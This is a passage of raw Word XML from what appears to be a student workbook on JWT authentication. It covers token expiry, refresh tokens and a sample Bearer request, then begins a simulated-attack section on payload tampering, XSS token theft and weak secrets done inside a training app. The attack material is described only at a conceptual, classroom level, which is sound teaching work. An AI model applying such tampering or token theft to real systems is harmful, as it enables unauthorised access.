        <w:t xml:space="preserve">Why Do Tokens Expire?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0066CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Security limit damage: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">If a token is stolen, the attacker only has access until it expires. A 15-minute token limits the attack window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0066CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Force re-verification: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensures the user still exists, still has the correct role, and has not been banned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0066CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Best practice values: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Access token: 15 minutes to 1 hour. Refresh token: 7–30 days.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6CC" w:sz="4"/>
              <w:left w:val="single" w:color="0066CC" w:sz="20"/>
              <w:bottom w:val="single" w:color="0066CC" w:sz="4"/>
              <w:right w:val="single" w:color="0066CC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E6F0FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">The Refresh Token Pattern — Staying Logged In Seamlessly</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Short-lived access tokens are secure but annoying if users must re-login every 15 minutes. The solution:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">1.  Short-lived access token (15 min) — used for every API call.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">2.  Long-lived refresh token (7–30 days) — stored in a secure httpOnly cookie.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">3.  When the access token expires, the app silently sends the refresh token to get a new access token. User never notices.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT in a Real API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6CC" w:sz="4"/>
              <w:left w:val="single" w:color="0066CC" w:sz="24"/>
              <w:bottom w:val="single" w:color="0066CC" w:sz="4"/>
              <w:right w:val="single" w:color="0066CC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EAF4FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A3A6E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">👉  DO THIS IN THE APP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Go to Module 09 in the app.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Click  ▶ Send Request  — watch the status change from 'Sending...' to '200 OK'.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Look carefully at the Authorization header — the Bearer keyword and the long token value.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Read the server verification steps shown at the bottom of the module.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E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/profile HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: api.example.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Type: application/json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="66C2FF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Bearer </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFD27A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">eyJhbGciOiJIUzI1NiJ9.eyJ1c2VySWQiOjEwMX0.SflKxwRJSMeKKF2...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">//  ↑  The word 'Bearer' is a standard HTTP keyword meaning 'I present this token as proof'</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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The Authorization header format is:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The token expires after:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">If a token expires, the user must:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pP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Borders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="7B0010" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="34"/>
                <w:szCs w:val="34"/>
              </w:rPr>
              <w:t xml:space="preserve">Security — JWT Attack Simulations</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7B0010" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="240"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="240"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">  ⚠️  IMPORTANT — This section covers real attacks. Understanding attacks is essential for building secure systems.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6CC" w:sz="4"/>
              <w:left w:val="single" w:color="0066CC" w:sz="24"/>
              <w:bottom w:val="single" w:color="0066CC" w:sz="4"/>
              <w:right w:val="single" w:color="0066CC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EAF4FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A3A6E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">👉  DO THIS IN THE APP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Go to Module 07 in the app.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">You will see THREE tabs at the top: Payload Tampering, Token Theft (XSS), Weak Secret.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Work through each tab one at a time — your teacher will guide you.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0022"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack 1 — Payload Tampering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6CC" w:sz="4"/>
              <w:left w:val="single" w:color="0066CC" w:sz="24"/>
              <w:bottom w:val="single" w:color="0066CC" w:sz="4"/>
              <w:right w:val="single" w:color="0066CC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EAF4FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A3A6E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">👉  DO THIS IN THE APP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">In Tab 1, find the role selector. Change it from "user" to "admin".</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Watch what happens to the token — specifically the SIGNATURE section (it turns red!).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Click  📤 Send to Server  — read the result message carefully.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Now change it back to "user" and send again. Compare the two results.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0022"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">What the attacker tries: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
